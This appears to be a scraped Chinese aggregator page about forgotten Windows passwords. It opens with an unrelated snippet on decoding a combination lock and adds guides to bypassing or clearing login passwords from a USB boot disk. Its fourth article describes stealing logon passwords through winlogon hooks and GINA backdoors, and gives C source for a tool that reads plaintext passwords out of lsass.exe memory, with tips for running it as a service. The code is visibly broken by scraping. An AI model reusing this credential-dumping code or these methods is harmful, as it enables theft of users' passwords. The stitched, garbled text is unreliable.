0

win81密码忘了怎么办(推荐四篇)

:将密码尽力向开关可拉动的反方向推,打开手电照缝隙,转动密码盘,观察之下的转轴凹槽,发现凹槽后,记录凹槽所对数字,三个密码盘逐一记录数字,得到三个数字,将数字逐位处理:小于5的加5,大于5的减5,即得到密码。

浏览

7447

文章

4

篇1:如何设置电脑开机密码,教你怎么设置开机密码winxp/win

全文共 143 字

+ 加入清单

现在很多人都在用电脑,所以今天就给大家讲讲如何设置电脑开机密码

材料/工具

电脑

xp

首先打开控制面板。

然后点击用户账号。

然后点击计算管理员。

然后点击创建密码。

然后输入密码并点击创建密码。

win7

首先打开控制面板。

然后选择用户账户和家庭安全。

然后单击为您的帐户创建密码。

最后,输入密码完成。

展开阅读全文

篇2:WIN 7忘记开机密码如何开机

全文共 611 字

+ 加入清单

这里介绍win7忘记开机密码如何开机的2种方法,此篇指南可以为您解决这个问题

工具/材料

U盘启动盘

方法1:直接清除Windows登录账户密码

1

以戴尔电脑为例,开机按“F2”键进入BIOS中

2

找到“Boot Sequence”选项,点击此项

3

勾选“USB Storage Device ”选项,点击“向上箭头”键将USB Storage Device 置于第一启动项;

在“Boot List Option”中选择“Legacy”选项

4

点击“Exit”,选择“Yes”保存刚才的设置,插入U盘,重启电脑后进入U盘PE系统

5

进入U盘PE系统中,点击“运行Windows登录密码破解菜单——清除Windows登录密码(修改密码)”选项

6

选择Windows系统所在分区,选择好后输入序号1,按“Enter”键

7

系统会自动搜索SAM(账户密码文件)位置

8

搜索到密码文件后,按“Enter”键继续

9

然后选择你设置密码的账户,输入序号,按“Enter”键

10

然后选择你设置密码的账户,输入序号,按“Enter”键

11

重启电脑后已经没有了账户登录密码,正常进入Windows 7桌面

方法2:绕过Windows账户登录密码

1

在U盘PE系统中,选择“运行Windows 登录密码破解菜单”

2

选择“绕过Windows 登录密码(不修改密码)”

3

成功进入Windows 7系统

特别提示

注意:方法1是彻底清除Windows 账户登录密码

注意:方法2是绕过Windows 账户密码,但是密码还在,可以进入控制面板重新修改账户密码

仅个人经历得出的结论

若有不足的话,还望指教

谢谢各位支持

展开阅读全文

篇3:win nt密码编辑器怎样修改电脑开机密码

全文共 400 字

+ 加入清单

当我们装系统时会设置开机密码,但如果遇到忘记开机密码时那该怎么办呢?有两种办法,一种是清除开机密码,另一种办法是修改开机密码。但是清除密码会造成系统不稳定,那么要如何修改电脑开机密码呢?下面小编教大家通过u启动winpe系统中的winnt密码编辑器来实现这个操作。

1、将u启动u盘插入计算机usb接口,重启电脑,出现开机画面后按快捷键进入u启动主菜单列表,接着将光标移至“【03】运行u启动win03pe增强版”并按回车确定,如图所示:

2、进入pe系统桌面后,打开开始菜单,然后依次点击“程序--密码管理--win nt密码编辑”,如图所示:

3、在win nt密码编辑器界面点击“打开”按钮,随后列表会显示系统中的帐户,点击目标帐户,接着点击“更改口令”,如图所示:

4、在弹出的编辑框中输入新密码并点击“OK”确认,如图所示:

5、然后返回到win nt密码编辑界面,点击“保存更改”按钮,如图所示:

展开阅读全文

篇4:如何在win 2003中得到登陆密码

全文共 7248 字

+ 加入清单

如何在win2003中得到登陆密码

在所有NT系统中,都是有几种方法可以得到登陆用户的密码的。我知道的三种方法可以达到目的。

1.hook了winlogon中几个函数,网上也有这类型的程序,叫winlogonhijack的项目在rootkit.com中有提供,不过那个项目只对本地登陆用户有效,远程登陆用户无效。 2.使用Gina和winlogon进行套接,只要对某些函数执行自己的记录密码的代码,就可以将密码记录下来,稳定性高,而且对本地或远程登陆都有效,不过现存的gina后门程序在XP或2003中都有些函数没有被导出过,主要因为xp和2003等在winlogon中加入了新的函数。

3.直接读取内存数据得到明文密码。在NT 4.0/2K中,早就有程序findpass可以直接读到winlogon进程中的内存数据而直接得到登陆用户密码,因为在NT4.0和2K中,帐号的信息,包括域名,帐号和密码都是有规律地在winlogon内存中的特定地址中,所以可以很简单就得到。但在XP和2003系统中,这样方法是无效的了,似乎我们是没有办法直接读出明文地址了。下面我们就来谈谈如何象findpass在NT 4.0和2K在,在server 2003中得到登陆用户的密码。

虽然XP和2003是不象以前的NT系统那样将登陆用户信息保存在winlogon进程的内存地址内,但是基Lsass进程对于要处理些信息时,需要得到明文的登陆用户密码,所以登陆用户的密码会在Lsass进程中出现(微软没有将密码在Lsass进程中进行加密,微软的说法是因为Lsass需要得到明文的密码,就算将密码加密,也都只能用可逆的方法加密,只要跟踪lsass的操作,一样可以得到明文密码,所以微软使用了比较懒惰的方法,可能也是为了加快响应速度,所以将明文密码更是放在lsass进程内存内)。说到这里,大家心里都清楚了,登陆用户的密码是在lsass进程的内存中。对,就是这么一回事,但是要得到这个明文密码,真是象使用NT 4.0和2K下的findpass那样容易吗?事实上并不是那么容易,因为以下几个原因:

A.密码存放在lsass进程中的内存地址是没有规律的

B.密码有可能被最后登陆的用户复盖(例如管理员abc从本地登陆,然后管理员bbb从远程登陆,然后管理员bbb注销终端,存放在lsass.exe进程内存中的密码,还是管理员bbb的密码),又或者用户登陆后,然后注销了,那么我们就算得到了密码,也不知道是哪个用户的密码。

C.密码前后的数据也是没有规律的,如果有规律,例如密码前的数据,一定是有一段全是01字符的数据段,那么定位密码就简单。

原因A和C都给我们带来定位密码的困难,原B就带来不能确定密码和帐号对应的问题.看来微软在新的系统还是做过点功夫。不过我们是不会放弃的,就算是碰碰运气,也看能不能得到密码,反正就算失败,也没什么关系。

最后的代码,是我写来测试是不是能在2003的系统中得到登际用户的密码,结果也正好象我们上面的分析一样(当然了,上面的结果是用这程序测测得到的)。成功率当然不高,因为受太多原因所影响,定位密码上的困难或者无法定位,或者得到不是密码的信息等等的原因,都令失败率显得相当高,不过总还是一种方法,或者将来有人可以准确定位到,那就是令人高兴了。虽然说失败率高,但在一种情况下,成功率却是很高的,那就是管理员只是在本地或终端中登陆了,以后再没有用户从本地或终端登陆过,而且管理员也没有锁上过系统,那么成功率就会是相当高的了。

提高成功率的两种做法:

1.程序直接写成服务,定时检查本地或远程登陆(其实没什么分别),当检测到登陆后,去搜索lsass进程内存,尝试得到密码。 2.程序模拟一个登陆(使用LogonUser()就能搞定),因为使用LogonUser()这个API,你要提供帐号名和对应的正确的密码,才可以成功,然后你就可以去搜索lsass进程内存。因为知道密码是什么,我们就能定位到密码是保存在什么地方。因为登陆用户的密码都是保存在同一个地址或相离不远的地址中,模拟登陆和搜索,可以先定位以后登陆的用户的密码会大约保存在什么位置。

无论怎说,三种方法中,最稳定,最安全的方法还是使用Gina那种方法.Hijack了winlogn一些API的方法,毕竟是改动了系统的东西,对系统的稳定性来说,会有考验,直接搜索lsass进程内存的方法呢,虽说也是困难,但准确性,成功率却又是低。

下面的代码使用的是很笨,而且很原始的搜索方法,主要是搜索Lsass内存中"LocalSystem Remote Procedure"这个字符串,因为在相当多的测试中,密码都是保存在有这个字符串的地址后一点的位置中,当然了,很多系统并没有这个字符串,或者就算有,我们得到的都是错误的密码。

代码: //************************************************************* // Version: V1.0 // Coder: WinEggDrop // Date Release: 12/15/2004 // Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method // Used Is Pretty Unwise,But This May Be The Only Way To Review The // Logon Users Password On Windows 2003. // Test PlatForm: Windows 2003 // Compiled On: VC++ 6.0 //*************************************************************#include #include #include

#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable

char Password[MAX_PATH] = ; // Store The Found Password

// Function ProtoType Declaration //------------------------------------------------------------------------------------------------------ BOOL FindPassword(DWORD PID); int Search(char *Buffer,const UINT nSize); DWORD GetLsassPID(); BOOL Is2003(); //------------------------------------------------------------------------------------------------------ // End Of Fucntion ProtoType Declaration

int main() { DWORD PID = 0; printf("Windows 2003 Password Viewer V1.0 By WinEggDropnn");

if (!Is2003()) // Check Out If The Box Is 2003 {printf("The Program Cant Only Run On Windows 2003 Platformn");return -1; }

PID = GetLsassPID(); // Get The Lsass.exe PID

if (PID == 0) // Fail To Get PID If Returning Zerom {return -1; }

FindPassword(PID); // Find The Password From Lsass.exe Memory return 0; } // End main()

//------------------------------------------------------------------------------------ // Purpose: Search The Memory & Try To Get The Password // Return Type: int // Parameters: // In: char *Buffer -->The Memory Buffer To Search // Out: const UINT nSize -->The Size Of The Memory Buffer // Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure", // Since The Password Is Near The Above Location,But Its Not Always True That // We Will Find The Magic String,Or Even We Find It,The Password May Be Located // At Some Other Place.We Only Look For Luck //------------------------------------------------------------------------------------ int Search(char *Buffer,const UINT nSize) { UINT OffSet = 0; UINT i = 0; UINT j = 0 ; UINT Count = 0; if (Buffer == NULL) {return -1; } for (i = 0 ; i 0){Password[Count++] = Buffer[j];}else{break;}}return i + 7; // One Flag To Indicate We Find The Password}} } return -1; // Well,We Fail To Find The Password,And This Always Happens } // End Search

//------------------------------------------------------------------------------------ // Purpose: To Get The Lsass.exe PID // Return Type: DWORD // Parameters: None //------------------------------------------------------------------------------------ DWORD GetLsassPID() { HANDLE hProcessSnap; HANDLE hProcess = NULL; PROCESSENTRY32 pe32; DWORD PID = 0;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if( hProcessSnap == INVALID_HANDLE_VALUE ) {printf("Fail To Create Snap Shotn");return 0; }

pe32.dwSize = sizeof(PROCESSENTRY32);

if( !Process32First(hProcessSnap, &pe32)) {CloseHandle(hProcessSnap); // Must clean up the snapshot object!return 0; }

do {if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0){PID = pe32.th32ProcessID;break;} }while(Process32Next( hProcessSnap, &pe32));

CloseHandle( hProcessSnap); return PID; } // End GetLsassPID()

//------------------------------------------------------------------------------------ // Purpose: To Find The Password // Return Type: BOOLEAN // Parameters: // In: DWORD PID ->The Lsass.exes PID //------------------------------------------------------------------------------------ BOOL FindPassword(DWORD PID) { HANDLE hProcess = NULL; char Buffer[5 * 1024] = ; DWORD ByteGet = 0; int Found = -1;

hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process if (hProcess == NULL) {printf("Fail To Open Processn");return FALSE; }

if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe {printf("Fail To Read Memoryn");CloseHandle(hProcess);return FALSE; }

CloseHandle(hProcess);Found = Search(Buffer,ByteGet); // Search The Password if (Found >= 0) // We May Find The Password {if (strlen(Password) >0) // Yes,We Find The Password Even We Dont Know If The Password Is Correct Or Not{printf("Found Password At #0x%x ->"%s"n",Found + BaseAddress,Password);} } else {printf("Fail To Find The Passwordn"); } return TRUE; } // End FindPassword

//------------------------------------------------------------------------------------ // Purpose: Check If The Box Is Windows 2003 // Return Type: BOOLEAN // Parameters: None //------------------------------------------------------------------------------------ BOOL Is2003() { OSVERSIONINFOEX osvi; BOOL b0sVersionInfoEx; ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX)); osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi))) {osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); } return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2); } // End Is2003() // End Of File

附件程序相当于密码定位程序,用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.

用法:

1.locator 字符串 ->在lsass进程内存中搜索指定的那个"字符串",返回确定的位置

2.Locator 用户名 密码 ->在系统中建立一个参数指定的用户,并进行模拟登陆,然后搜索"密码"在lsass进程内存中的位置,生成的帐户程序运行完后会自动删除。

展开阅读全文